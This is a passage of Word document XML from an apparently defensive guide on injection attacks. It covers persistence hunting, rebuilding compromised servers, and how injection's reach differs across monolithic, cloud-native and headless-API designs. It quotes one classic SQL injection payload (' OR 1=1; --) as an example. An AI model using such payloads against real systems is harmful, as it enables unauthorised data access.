          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Database Audit Logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Review the history of executed queries on the database engine. Look for unusual queries that bypass standard application logic, structural updates, data exports, or execution of administrative database procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209C16C"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Hunting for Persistence (Backdoors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E021C"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If the attacker successfully achieved Remote Code Execution (RCE) via OS Command Injection, the host server must be treated as completely compromised. Security analysts must inspect the system for signs of persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB3B6A7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs, scheduled tasks, and system startup scripts for unauthorized additions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B72ED45" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Review active network connections for unusual outbound listening ports or active SSH keys added to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030570A6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Monitor running processes for hidden binary executions masquerading as system processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF3818"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Safe Recovery &amp; Restoration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7B580"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Rather than attempting to clean a compromised server manually—which runs the risk of missing hidden rootkits—the most secure approach is to rebuild the environment from the ground up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5AFCF5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Decommission the Compromised Node:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Take the affected instance entirely offline for deep forensic cloning, preserving its disk image for deeper regulatory investigations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA73952" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy Clean Immutable Infrastructure:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spin up entirely new virtual instances or containers using known-good, secure infrastructure-as-code (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) blueprints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EAB13" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Restore Verified Data Backups:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restore the application data from a verified backup taken </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>prior</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the timestamp of the initial exploitation, ensuring that malicious database records or backdoored stored procedures are not re-introduced into the new environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05B8CA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Context &amp; Variations (The Modern Landscape)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F02C2"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The landscape of injection vulnerabilities has evolved alongside modern software architectures. While the core programming mistake remains the same, the entry points, boundaries, and overall blast radius change significantly across different environments and interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569C38A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Environment Differences: Monolith vs. Cloud-Native</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F50BD"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The architectural design of an application determines how far an injection attack can spread once a boundary is breached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004920B4"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Traditional Monolithic On-Premise Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10785C28" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Environment:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A single, large codebase running directly on a localized operating system or virtual machine, tightly bound to a central relational database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747417F0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Manifestation of Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If an attacker hits an </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OS Command Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability in a monolith, they immediately gain a foothold inside the primary system context. Since everything shares the same memory space or server host, the attacker can easily execute lateral movement, dump the primary corporate database, read internal server configuration files, or compromise the entire host operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C73D3E"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Modern Cloud-Native / Microservices / Serverless Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A854486" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Environment:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ephemeral, stateless containers (e.g., Docker, Kubernetes) or isolated cloud execution environments (e.g., AWS Lambda, Azure Functions) communicating via lightweight APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A289B8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Manifestation of Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The blast radius of a traditional host-level attack is highly constrained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A24CC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>If an attacker executes OS Command Injection inside a serverless function, they are trapped inside a temporary, sandbox container that may self-destruct in a few minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B26E7D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">However, injection manifests in new vectors, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>NoSQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (targeting databases like MongoDB or DynamoDB) or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloud API Parameter Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . The threat shifts from full host takeover to microservice impersonation, where an attacker manipulates internal tokens or messages to trick one service into granting unauthorized access to another downstream service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D459D15" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Headless API vs. Traditional Web Frontend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A80924"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 xml:space="preserve">When moving away from traditional web frontends toward headless architectures (REST or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs), the entry points and payload structures adapt to match how data is parsed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373941B"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Traditional Web Frontends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5405841C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vectors:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input parameters are primarily passed via browser forms ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>xwww</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), URL query parameters ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>?id=5</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), or cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A9F7C4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload Characteristics:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payloads rely heavily on form-breaking elements like alphanumeric strings combined with quotes or SQL comment tags ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>' OR 1=1; --</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9312FC"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 xml:space="preserve">Headless APIs (REST / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C4642" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vectors:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input data is structured inside request bodies as serialized JSON or XML objects, or heavily nested schemas within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F301D6F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload Changes:</w:t>
      </w:r>
